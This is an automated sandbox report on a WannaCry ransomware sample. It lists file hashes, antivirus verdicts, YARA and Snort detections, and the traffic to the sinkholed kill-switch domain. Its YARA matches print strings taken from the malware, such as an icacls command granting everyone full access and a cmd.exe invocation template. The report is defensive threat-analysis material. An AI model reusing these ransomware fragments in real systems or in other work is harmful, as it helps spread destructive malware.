Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
THN6clTA6P.exe

Overview

General Information

Sample Name:THN6clTA6P.exe
Analysis ID:694554
MD5:3983f0ebeec88b8005724a203ae27180
SHA1:9f34d48eae30b6da0a5c5297a873f989a49e10e8
SHA256:ed492db95034ca288dd52df88e3ce3ec7b146ffd854a394ac187f0553ef966d9
Infos:

Detection

Wannacry
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Tries to download HTTP data from a sinkholed server
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Yara detected Wannacry ransomware
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Machine Learning detection for sample
Uses 32bit PE files
Found decision node followed by non-executed suspicious APIs
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
HTTP GET or POST without a user agent
PE file contains executable resources (Code or Archives)
Contains functionality to query network adapater information

Classification

Process Tree

  • System is w10x64
  • THN6clTA6P.exe (PID: 2996 cmdline: "C:\Users\user\Desktop\THN6clTA6P.exe" MD5: 3983F0EBEEC88B8005724A203AE27180)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
THN6clTA6P.exeWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
  • 0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0x374de5:$x2: taskdl.exe
  • 0x38b6d1:$x2: taskdl.exe
  • 0x3136c:$x3: tasksche.exe
  • 0x4157c:$x3: tasksche.exe
  • 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0x415d0:$x5: WNcry@2ol7
  • 0xe048:$x7: mssecsvc.exe
  • 0x17350:$x7: mssecsvc.exe
  • 0x31344:$x8: C:\%s\qeriuwjhrf
  • 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0xe034:$s1: C:\%s\%s
  • 0x17338:$s1: C:\%s\%s
  • 0x31358:$s1: C:\%s\%s
  • 0x38be35:$s2: Windows 10 -->
  • 0x414d0:$s3: cmd.exe /c "%s"
  • 0x73a24:$s4: msg/m_portuguese.wnry
  • 0x38b2a3:$s4: msg/m_portuguese.wnry
  • 0x2e68c:$s5: \\192.168.56.20\IPC$
  • 0x1ba81:$s6: \\172.16.99.5\IPC$
  • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
THN6clTA6P.exeWannaCry_Ransomware_GenDetects WannaCry RansomwareFlorian Roth (based on rule by US CERT)
  • 0x1bacc:$s1: __TREEID__PLACEHOLDER__
  • 0x1bb68:$s1: __TREEID__PLACEHOLDER__
  • 0x1c3d4:$s1: __TREEID__PLACEHOLDER__
  • 0x1d439:$s1: __TREEID__PLACEHOLDER__
  • 0x1e4a0:$s1: __TREEID__PLACEHOLDER__
  • 0x1f508:$s1: __TREEID__PLACEHOLDER__
  • 0x20570:$s1: __TREEID__PLACEHOLDER__
  • 0x215d8:$s1: __TREEID__PLACEHOLDER__
  • 0x22640:$s1: __TREEID__PLACEHOLDER__
  • 0x236a8:$s1: __TREEID__PLACEHOLDER__
  • 0x24710:$s1: __TREEID__PLACEHOLDER__
  • 0x25778:$s1: __TREEID__PLACEHOLDER__
  • 0x267e0:$s1: __TREEID__PLACEHOLDER__
  • 0x27848:$s1: __TREEID__PLACEHOLDER__
  • 0x288b0:$s1: __TREEID__PLACEHOLDER__
  • 0x29918:$s1: __TREEID__PLACEHOLDER__
  • 0x2a980:$s1: __TREEID__PLACEHOLDER__
  • 0x2ab94:$s1: __TREEID__PLACEHOLDER__
  • 0x2abf4:$s1: __TREEID__PLACEHOLDER__
  • 0x2e2c4:$s1: __TREEID__PLACEHOLDER__
  • 0x2e340:$s1: __TREEID__PLACEHOLDER__
THN6clTA6P.exeJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
    THN6clTA6P.exewanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
    • 0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
    • 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
    THN6clTA6P.exeWin32_Ransomware_WannaCryunknownReversingLabs
    • 0x340ba:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
    • 0x8140:$main_3: 83 EC 50 56 57 B9 0E 00 00 00 BE D0 13 43 00 8D 7C 24 08 33 C0 F3 A5 A4 89 44 24 41 89 44 24 45 89 44 24 49 89 44 24 4D 89 44 24 51 66 89 44 24 55 50 50 50 6A 01 50 88 44 24 6B FF 15 34 A1 40 ...
    • 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ...
    • 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ...
    • 0x3985e:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
      00000001.00000000.262463921.000000000040F000.00000008.00000001.01000000.00000005.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
        00000001.00000000.262558061.0000000000710000.00000002.00000001.01000000.00000005.sdmpwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
        • 0xf57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
        • 0xf5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
        00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
        • 0xf57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
        • 0xf5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
        Process Memory Space: THN6clTA6P.exe PID: 2996JoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.2.THN6clTA6P.exe.7100a4.1.raw.unpackWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
          • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
          • 0x342d41:$x2: taskdl.exe
          • 0x35962d:$x2: taskdl.exe
          • 0xf4d8:$x3: tasksche.exe
          • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
          • 0xf52c:$x5: WNcry@2ol7
          • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
          • 0x359d91:$s2: Windows 10 -->
          • 0xf42c:$s3: cmd.exe /c "%s"
          • 0x41980:$s4: msg/m_portuguese.wnry
          • 0x3591ff:$s4: msg/m_portuguese.wnry
          • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
          • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
          • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
          1.2.THN6clTA6P.exe.7100a4.1.raw.unpackwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
          • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
          • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
          1.2.THN6clTA6P.exe.7100a4.1.raw.unpackWin32_Ransomware_WannaCryunknownReversingLabs
          • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
          • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
          1.0.THN6clTA6P.exe.400000.0.unpackWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
          • 0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q
          • 0x374de5:$x2: taskdl.exe
          • 0x38b6d1:$x2: taskdl.exe
          • 0x3136c:$x3: tasksche.exe
          • 0x4157c:$x3: tasksche.exe
          • 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA
          • 0x415d0:$x5: WNcry@2ol7
          • 0x17350:$x7: mssecsvc.exe
          • 0x31344:$x8: C:\%s\qeriuwjhrf
          • 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q
          • 0x17338:$s1: C:\%s\%s
          • 0x31358:$s1: C:\%s\%s
          • 0x38be35:$s2: Windows 10 -->
          • 0x414d0:$s3: cmd.exe /c "%s"
          • 0x73a24:$s4: msg/m_portuguese.wnry
          • 0x38b2a3:$s4: msg/m_portuguese.wnry
          • 0x2e68c:$s5: \\192.168.56.20\IPC$
          • 0x1ba81:$s6: \\172.16.99.5\IPC$
          • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
          • 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
          • 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
          1.0.THN6clTA6P.exe.400000.0.unpackWannaCry_Ransomware_GenDetects WannaCry RansomwareFlorian Roth (based on rule by US CERT)
          • 0x1bacc:$s1: __TREEID__PLACEHOLDER__
          • 0x1bb68:$s1: __TREEID__PLACEHOLDER__
          • 0x1c3d4:$s1: __TREEID__PLACEHOLDER__
          • 0x1d439:$s1: __TREEID__PLACEHOLDER__
          • 0x1e4a0:$s1: __TREEID__PLACEHOLDER__
          • 0x1f508:$s1: __TREEID__PLACEHOLDER__
          • 0x20570:$s1: __TREEID__PLACEHOLDER__
          • 0x215d8:$s1: __TREEID__PLACEHOLDER__
          • 0x22640:$s1: __TREEID__PLACEHOLDER__
          • 0x236a8:$s1: __TREEID__PLACEHOLDER__
          • 0x24710:$s1: __TREEID__PLACEHOLDER__
          • 0x25778:$s1: __TREEID__PLACEHOLDER__
          • 0x267e0:$s1: __TREEID__PLACEHOLDER__
          • 0x27848:$s1: __TREEID__PLACEHOLDER__
          • 0x288b0:$s1: __TREEID__PLACEHOLDER__
          • 0x29918:$s1: __TREEID__PLACEHOLDER__
          • 0x2a980:$s1: __TREEID__PLACEHOLDER__
          • 0x2ab94:$s1: __TREEID__PLACEHOLDER__
          • 0x2abf4:$s1: __TREEID__PLACEHOLDER__
          • 0x2e2c4:$s1: __TREEID__PLACEHOLDER__
          • 0x2e340:$s1: __TREEID__PLACEHOLDER__
          Click to see the 17 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.38.8.8.860625532024293 08/31/22-23:46:48.979040
          SID:2024293
          Source Port:60625
          Destination Port:53
          Protocol:UDP
          Classtype:A Network Trojan was detected
          Timestamp:104.21.68.165192.168.2.380497462016803 08/31/22-23:46:49.148342
          SID:2016803
          Source Port:80
          Destination Port:49746
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: THN6clTA6P.exeAvira: detected
          Multi AV Scanner detection for submitted file
          Source: THN6clTA6P.exeVirustotal: Detection: 88%Perma Link
          Source: THN6clTA6P.exeMetadefender: Detection: 89%Perma Link
          Source: THN6clTA6P.exeReversingLabs: Detection: 100%
          Antivirus detection for URL or domain
          Source: http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com/Avira URL Cloud: Label: malware
          Source: http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.comAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.comVirustotal: Detection: 5%Perma Link
          Source: http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com/Virustotal: Detection: 5%Perma Link
          Source: http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.comVirustotal: Detection: 5%Perma Link
          Machine Learning detection for sample
          Source: THN6clTA6P.exeJoe Sandbox ML: detected
          Source: 1.2.THN6clTA6P.exe.7100a4.1.unpackAvira: Label: TR/Ransom.JB
          Source: 1.2.THN6clTA6P.exe.400000.0.unpackAvira: Label: TR/Ransom.JB
          Source: 1.0.THN6clTA6P.exe.7100a4.1.unpackAvira: Label: TR/Ransom.JB
          Source: 1.0.THN6clTA6P.exe.400000.0.unpackAvira: Label: TR/Ransom.JB
          Source: C:\Users\user\Desktop\THN6clTA6P.exeCode function: 1_2_00407660 rand,EnterCriticalSection,CryptGenRandom,LeaveCriticalSection,1_2_00407660
          Source: C:\Users\user\Desktop\THN6clTA6P.exeCode function: 1_2_00407620 CryptAcquireContextA,CryptAcquireContextA,InitializeCriticalSection,1_2_00407620
          Source: THN6clTA6P.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

          Networking

          barindex
          Tries to download HTTP data from a sinkholed server
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 31 Aug 2022 21:46:49 GMTContent-Type: text/html;charset=UTF-8Content-Length: 113Connection: keep-alivex-sinkhole: sinkhole@blacklistthisdomain.comReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BwAJjUBV7QoBfDcQC5xHuwWf6HaSer5urPutgRH%2BIhWdxjAnZxQhv3Lj7wdnu2PPlKacdGr9jV%2FTSwi3vI%2BYOhYgTU0rv1q0jFccnc7tRao14EgvdRHCOJyooOZRF5g5vft43xf7R9Y9%2BZ3RRpCsAmuUjh5Fhtj03GcJjYsFDcilY2Vk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7438f608df147765-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 42 6c 61 63 6b 4c 69 73 74 54 68 69 73 44 6f 6d 61 69 6e 20 2d 20 53 69 6e 6b 68 6f 6c 65 3c 2f 68 31 3e 0a 20 20 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e Data Ascii: <!DOCTYPE html><body> <h1>BlackListThisDomain - Sinkhole</h1> <p>This domain has been sinkholed.</p></body>
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2024293 ET TROJAN Possible WannaCry DNS Lookup 2 192.168.2.3:60625 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2016803 ET TROJAN Known Sinkhole Response Header 104.21.68.165:80 -> 192.168.2.3:49746
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
          Source: THN6clTA6P.exeString found in binary or memory: http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com
          Source: unknownDNS traffic detected: queries for: www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com
          Source: C:\Users\user\Desktop\THN6clTA6P.exeCode function: 1_2_00406F50 GlobalAlloc,send,recv,htons,send,recv,GlobalFree,1_2_00406F50
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Yara detected Wannacry ransomware
          Source: Yara matchFile source: THN6clTA6P.exe, type: SAMPLE
          Source: Yara matchFile source: 1.0.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.262463921.000000000040F000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: THN6clTA6P.exe PID: 2996, type: MEMORYSTR

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: THN6clTA6P.exe, type: SAMPLEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: THN6clTA6P.exe, type: SAMPLEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
          Source: THN6clTA6P.exe, type: SAMPLEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: THN6clTA6P.exe, type: SAMPLEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 1.2.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.2.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 1.2.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 1.0.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.0.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
          Source: 1.0.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 1.0.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 1.2.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.2.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 1.2.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 1.0.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.0.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 1.0.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 1.0.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.0.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 1.0.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 1.2.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.2.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
          Source: 1.2.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 1.2.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 00000001.00000000.262558061.0000000000710000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: THN6clTA6P.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: THN6clTA6P.exe, type: SAMPLEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: THN6clTA6P.exe, type: SAMPLEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
          Source: THN6clTA6P.exe, type: SAMPLEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: THN6clTA6P.exe, type: SAMPLEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.2.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.2.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.2.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.0.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.0.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
          Source: 1.0.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.0.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.2.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.2.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.2.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.0.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.0.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.0.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.0.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.0.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.0.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.2.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
